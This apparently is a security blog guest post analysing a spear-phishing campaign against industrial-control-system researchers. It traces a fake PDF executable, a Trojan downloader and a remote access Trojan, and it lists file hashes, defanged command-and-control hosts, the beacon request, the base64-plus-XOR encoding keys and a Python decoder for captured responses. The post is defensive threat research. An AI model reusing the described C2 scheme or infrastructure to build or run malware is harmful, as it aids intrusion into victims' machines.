SCADA malware

The following is a guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security.

Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip
Size: 1886505 bytes
MD5:  820B1CD69828983C089370BDC3CF5870

This archive contained an executable with the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe
Size: 2192363 bytes
MD5:  C6B95B178188B8C35D14BED40520E685

When executed in a lab environment, this executable installed a Trojan downloader with the following properties:

File: spoolsvr.exe
Size: 73728 bytes
MD5:  5FF3269FACA4A67D1A4C537154AAAD4B
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe

As shown by this VirusTotal report, this downloader was only detected by 7 of 42 antivirus products. This downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:

GET /logo.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: hint.happyforever.com
Connection: Keep-Alive

The logo.html file contained encoded instructions and a payload. A snippet of the response is as follows:

<html><head>Ji01LC4tIyZ4eTEuJycyeHByeQ==</head><title>NiMsJSoubCc6Jw==</title><body>DxjSQkFCQkJGQkJCvb1CQvpCQkJCQkJCAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC


The above text can be decoded via the following two-step process. First, decode with the standard base64 alphabet, then XOR every resulting byte with the single-byte key 0x42. The <head> tag will decode to:

<head>download:;sleep:20;</head>

These commands instruct the spoolsvr.exe downloader to retrieve and decode a secondary executable payload contained in the <body> tag. The <title> tag will decode to:

<title>tanghl.exe</title>

This command instructs the spoolsvr.exe downloader to save the secondary payload decoded from the <body> tag onto the victim machine as tanghl.exe.
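As an added example (not code from the original post or from the malware), the following Python decodes a logo.html-style response exactly as described above: base64, then XOR with 0x42, with the <head> split into commands and the <body> checked for a PE header. The <head> and <title> values are the ones quoted in the post; the <body> is only the first 24 base64 characters of the quoted snippet, and the function names are my own.

```python
import base64
import re

# Constructed from the logo.html snippet quoted in the post: head and title
# in full, body truncated to its first 24 base64 characters (18 raw bytes).
SAMPLE_RESPONSE = (
    "<html><head>Ji01LC4tIyZ4eTEuJycyeHByeQ==</head>"
    "<title>NiMsJSoubCc6Jw==</title>"
    "<body>DxjSQkFCQkJGQkJCvb1CQvpC</body></html>"
)

XOR_KEY = 0x42  # single-byte key used for the spoolsvr.exe downloader traffic


def decode_field(text, key=XOR_KEY):
    """Base64-decode a tag's content, then XOR every byte with the key."""
    cleaned = re.sub(r"\s+", "", text)
    cleaned += "=" * (-len(cleaned) % 4)  # tolerate stripped '=' padding
    return bytes(b ^ key for b in base64.b64decode(cleaned))


def parse_commands(cmd_string):
    """Split 'download:;sleep:20;' into [('download', ''), ('sleep', '20')]."""
    out = []
    for item in cmd_string.split(";"):
        if not item:
            continue
        name, _, arg = item.partition(":")
        out.append((name, arg))
    return out


def parse_response(html, key=XOR_KEY):
    """Extract and decode the head, title and body tags of a captured page."""
    fields = {}
    for tag in ("head", "title", "body"):
        m = re.search(r"<%s>(.*?)</%s>" % (tag, tag), html, re.S)
        if m:
            fields[tag] = decode_field(m.group(1), key)
    payload = fields.get("body", b"")
    return {
        "commands": parse_commands(fields.get("head", b"").decode("ascii", "replace")),
        "filename": fields.get("title", b"").decode("ascii", "replace"),
        "payload": payload,
        # A decoded body starting with the DOS 'MZ' magic is a Windows executable.
        "payload_is_pe": payload[:2] == b"MZ",
    }


if __name__ == "__main__":
    print(parse_response(SAMPLE_RESPONSE))
```

The same routine with key=0x6b matches the encoding the post describes for the tanghl.exe RAT's traffic.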

The tanghl.exe file is a Remote Access Trojan that gives the attacker full control of the victim machine. This tanghl.exe file had the following properties:

File: tanghl.exe
Size: 167936 bytes
MD5:  9B6692295FADF24B512D5F63E4F74D15
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\tanghl.exe

This RAT attempts to connect to another command and control server at 1.234.1.68 over port 80. Communications between the RAT and the control server are encoded via base64 and a single-byte XOR key of 0x6b.

The above patterns of attack are very similar to attacks carried out by the actors responsible for the Shady RAT campaign documented by McAfee. Similarities include the use of encoded commands hidden in otherwise normal-looking web pages, as well as an overlap between the command and control infrastructure used in this attack and that seen in previous Shady RAT attacks.

Ned Moran is a member of the Shadowserver Foundation (www.shadowserver.org) where he spends his time researching targeted attacks. He can be reached at ned /at/ shadowserver /dot/ org.

Image by Razza Mathadsa